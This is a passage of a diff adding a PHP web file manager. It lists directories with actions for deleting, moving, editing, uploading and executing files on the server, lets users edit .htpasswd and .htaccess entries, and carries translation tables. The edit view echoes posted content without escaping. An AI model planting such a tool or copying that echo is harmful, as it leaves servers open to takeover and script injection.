+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="functions">' . word('functions') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="functions">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'delete';
+			$actions[] = 'rename';
+			$actions[] = 'move';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'copy';
+			$actions[] = 'download';
+			if ($file['is_writable']) $actions[] = 'edit';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'delete';
+		$actions[] = 'move';
+	}
+	$actions[] = 'copy';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function edit ($file) {
+	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="edit" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $site_charset;
+	return htmlentities($string, ENT_COMPAT, $site_charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'functions' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'delete' => 'löschen',
+'rename' => 'umbenennen',
+'move' => 'verschieben',
+'copy' => 'kopieren',
+'edit' => 'editieren',
+'download' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'back' => 'zurück',
+'destination' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_delete' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'deleted' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_deleted' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'rename_file' => 'Benenne Datei um:',
+'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'move_files' => 'Verschieben folgende Dateien:',
+'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'copy_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_edited' => '"[%1]" kann nicht editiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'functions' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
+'create_symlink' => 'Créer lien symbolique',
+'delete' => 'Effacer',
+'rename' => 'Renommer',
+'move' => 'Déplacer',
+'copy' => 'Copier',
+'edit' => 'Ouvrir',
+'download' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'back' => 'Retour',
+'destination' => 'Destination',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_delete' => 'Effacer le fichier?',
+'deleted' => "Ces fichiers ont été détuits:\n[%1]",
+'not_deleted' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'rename_file' => 'Renomme fichier:',
+'renamed' => '"[%1]" a été renommé en "[%2]".',
+'not_renamed' => '"[%1] n a pas pu être renommé en "[%2]".',
+'move_files' => 'Déplacer ces fichiers:',
+'moved' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_moved' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'copy_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'functions' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'delete' => 'cancella',
+'rename' => 'rinomina',
+'move' => 'sposta',
+'copy' => 'copia',
+'edit' => 'modifica',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'back' => 'indietro',
+'destination' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_delete' => 'Cancello questi file ?',
+'deleted' => "Questi file sono stati cancellati:\n[%1]",
+'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
+'rename_file' => 'File rinominato:',
+'renamed' => '"[%1]" è stato rinominato in "[%2]".',
+'not_renamed' => '"[%1] non è stato rinominato in "[%2]".',
+'move_files' => 'Sposto questi file:',
+'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'copy_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'nl':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'Bestand',
+'filename' => 'Bestandsnaam',
+
+'size' => 'Grootte',
+'permission' => 'Bevoegdheid',
+'owner' => 'Eigenaar',
+'group' => 'Groep',
+'other' => 'Anderen',
+'functions' => 'Functies',
+
+'read' => 'lezen',
+'write' => 'schrijven',
+'execute' => 'uitvoeren',
+
+'create_symlink' => 'maak symlink',
+'delete' => 'verwijderen',
+'rename' => 'hernoemen',
+'move' => 'verplaatsen',
+'copy' => 'kopieren',
+'edit' => 'bewerken',
+'download' => 'downloaden',
+'upload' => 'uploaden',
+'create' => 'aanmaken',
+'change' => 'veranderen',
+'save' => 'opslaan',
+'set' => 'instellen',
+'reset' => 'resetten',
+'relative' => 'Relatief pat naar doel',
+
+'yes' => 'Ja',
+'no' => 'Nee',
+'back' => 'terug',
+'destination' => 'Bestemming',
+'symlink' => 'Symlink',
+'no_output' => 'geen output',
+
+'user' => 'Gebruiker',
+'password' => 'Wachtwoord',
+'add' => 'toevoegen',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" is verstuurd.',
+'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
+'already_exists' => '"[%1]" bestaat al.',
+'created' => '"[%1]" is aangemaakt.',
+'not_created' => '"[%1]" kan niet worden aangemaakt.',
+'really_delete' => 'Deze bestanden verwijderen?',
+'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
+'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
+'rename_file' => 'Bestandsnaam veranderen:',
+'renamed' => '"[%1]" heet nu "[%2]".',
+'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
+'move_files' => 'Verplaats deze bestanden:',
+'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
+'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
+'copy_files' => 'Kopieer deze bestanden:',
+'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
+'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan niet worden bewerkt.',
+'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
+'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
+'saved' => '"[%1]" is opgeslagen.',
+'not_saved' => '"[%1]" is niet opgeslagen.',
+'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
+'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
+'permission_for' => 'Bevoegdheid voor "[%1]":',
+'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
+'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
+'not_readable' => '"[%1]" kan niet worden gelezen.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'functions' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'delete' => 'Radera',
+'rename' => 'Byt namn',
+'move' => 'Flytta',
+'copy' => 'Kopiera',
+'edit' => 'Ändra',
+'download' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'back' => 'Tillbaks',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_delete' => 'Radera dessa filer?',
+'deleted' => "De här filerna har raderats:\n[%1]",
+'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
+'rename_file' => 'Byt namn på fil:',
+'renamed' => '"[%1]" har bytt namn till "[%2]".',
+'not_renamed' => '"[%1] kunde inte döpas om till "[%2]".',
+'move_files' => 'Flytta dessa filer:',
+'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'copy_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'sp':
+
+		$date_format = 'j/n/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directorio',
+'file' => 'Archivo',
+'filename' => 'Nombre Archivo',
+
+'size' => 'Tamaño',
+'permission' => 'Permisos',
+'owner' => 'Propietario',
+'group' => 'Grupo',
+'other' => 'Otros',
+'functions' => 'Funciones',
+
+'read' => 'lectura',
+'write' => 'escritura',
+'execute' => 'ejecución',
+
+'create_symlink' => 'crear enlace',
+'delete' => 'borrar',
+'rename' => 'renombrar',
+'move' => 'mover',
+'copy' => 'copiar',
+'edit' => 'editar',
+'download' => 'bajar',
+'upload' => 'subir',
+'create' => 'crear',
+'change' => 'cambiar',
+'save' => 'salvar',
+'set' => 'setear',
+'reset' => 'resetear',
+'relative' => 'Path relativo',
+
+'yes' => 'Si',
+'no' => 'No',
+'back' => 'atrás',
+'destination' => 'Destino',
+'symlink' => 'Enlace',
+'no_output' => 'sin salida',
+
+'user' => 'Usuario',
+'password' => 'Clave',
+'add' => 'agregar',
+'add_basic_auth' => 'agregar autentificación básica',
+
+'uploaded' => '"[%1]" ha sido subido.',
+'not_uploaded' => '"[%1]" no pudo ser subido.',
+'already_exists' => '"[%1]" ya existe.',
+'created' => '"[%1]" ha sido creado.',
+'not_created' => '"[%1]" no pudo ser creado.',
+'really_delete' => '¿Borra estos archivos?',
+'deleted' => "Estos archivos han sido borrados:\n[%1]",
+'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
+'rename_file' => 'Renombra archivo:',
+'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
+'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
+'move_files' => 'Mover estos archivos:',
+'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
+'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
+'copy_files' => 'Copiar estos archivos:',
+'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
+'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" no pudo ser editado.',
+'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
+'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
+'saved' => '"[%1]" ha sido salvado.',
+'not_saved' => '"[%1]" no pudo ser salvado.',
+'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
+'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
+'permission_for' => 'Permisos de "[%1]":',
+'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
+'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
+'not_readable' => '"[%1]" no pudo ser leído.'
+		);
+
+	case 'dk':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Mappe',
+'file' => 'Fil',
+'filename' => 'Filnavn',
+
+'size' => 'Størrelse',
+'permission' => 'Rettighed',
+'owner' => 'Ejer',
+'group' => 'Gruppe',
+'other' => 'Andre',
+'functions' => 'Funktioner',
+
+'read' => 'læs',
+'write' => 'skriv',
+'execute' => 'kør',
+
+'create_symlink' => 'opret symbolsk link',
+'delete' => 'slet',
+'rename' => 'omdøb',
+'move' => 'flyt',
+'copy' => 'kopier',
+'edit' => 'rediger',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'opret',
+'change' => 'skift',
+'save' => 'gem',
+'set' => 'sæt',
+'reset' => 'nulstil',
+'relative' => 'Relativ sti til valg',
+
+'yes' => 'Ja',
+'no' => 'Nej',
+'back' => 'tilbage',
+'destination' => 'Distination',
+'symlink' => 'Symbolsk link',
+'no_output' => 'ingen resultat',
+
+'user' => 'Bruger',
+'password' => 'Kodeord',
+'add' => 'tilføj',
+'add_basic_auth' => 'tilføj grundliggende rettigheder',
+
+'uploaded' => '"[%1]" er blevet uploaded.',
+'not_uploaded' => '"[%1]" kunnu ikke uploades.',
+'already_exists' => '"[%1]" findes allerede.',
+'created' => '"[%1]" er blevet oprettet.',
+'not_created' => '"[%1]" kunne ikke oprettes.',
+'really_delete' => 'Slet disse filer?',
+'deleted' => "Disse filer er blevet slettet:\n[%1]",
+'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
+'rename_file' => 'Omdød fil:',
+'renamed' => '"[%1]" er blevet omdøbt til "[%2]".',
+'not_renamed' => '"[%1] kunne ikke omdøbes til "[%2]".',
+'move_files' => 'Flyt disse filer:',
+'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
